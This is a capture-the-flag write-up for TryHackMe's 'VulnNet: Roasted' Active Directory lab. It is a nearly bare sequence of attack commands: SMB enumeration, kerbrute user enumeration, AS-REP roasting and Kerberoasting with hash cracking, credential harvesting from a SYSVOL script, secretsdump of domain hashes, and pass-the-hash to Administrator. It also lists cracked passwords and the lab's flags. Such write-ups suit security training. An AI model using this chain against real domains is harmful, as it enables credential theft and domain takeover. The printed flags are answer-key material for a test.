Platform: TryHackMe
Difficulty: Easy
IP Address: 10.201.79.171

VulnNet: Roasted is an Active Directory-themed Windows machine focused on enumeration, user hunting, AS-REP roasting, Kerberoasting, and privilege escalation through weak scripts. It demonstrates classic Windows network exploitation methodology, ending with full domain compromise.
rustscan -a $target --ulimit 5000 -- -sC -sV -Pn -oN nmap_full
vulnnet-rst.localsmbclient -L \\$target\
VulnNet-Business-AnonymousVulnNet-Enterprise-AnonymousRetrieved internal usernames:
Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet
git clone https://github.com/mohinparamasivam/AD-Username-Generator
python3 username-generate.py -u names.txt -o users.txt
kerbrute userenum users.txt --dc $target -d vulnnet-rst.local
Valid Users:
a-whitehatj-goldenhandt-skidj-leetGetNPUsers -dc-ip $target -usersfile users.txt -outputfile hashes.txt
Found AS-REP hash for: t-skid
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Password: tj072889*
crackmapexec winrm $target -u t-skid -p 'tj072889*' # Fails
GetUserSPNs -dc-ip $target 'vulnnet-rst.local/t-skid:tj072889*' -request
Service User: enterprise-core-vn
john --wordlist=/usr/share/wordlists/rockyou.txt krbhash.txt
Password: ry=ibfkfv,s6h,
evil-winrm -u enterprise-core-vn -p 'ry=ibfkfv,s6h,' -i $target
User Flag: THM{726b7c0baaac1455d05c827b5561f4ed}
smbclient -U 'enterprise-core-vn' \\$target\SYSVOL
get vulnnet-rst.local/scripts/ResetPassword.vbs
Credentials found:
a-whitehatbNdKVkjv3RR9htcrackmapexec winrm $target -u a-whitehat -p 'bNdKVkjv3RR9ht' # Pwn3d!
impacket-wmiexec vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@$target
Confirmed: a-whitehat is a Domain Admin.
impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@$target
impacket-wmiexec vulnnet-rst.local/Administrator@$target -hashes :c2597747aa5e43022a3a3049a3c3b09d
Root Flag: THM{16f45e3934293a57645f8d7bf71d8d4c}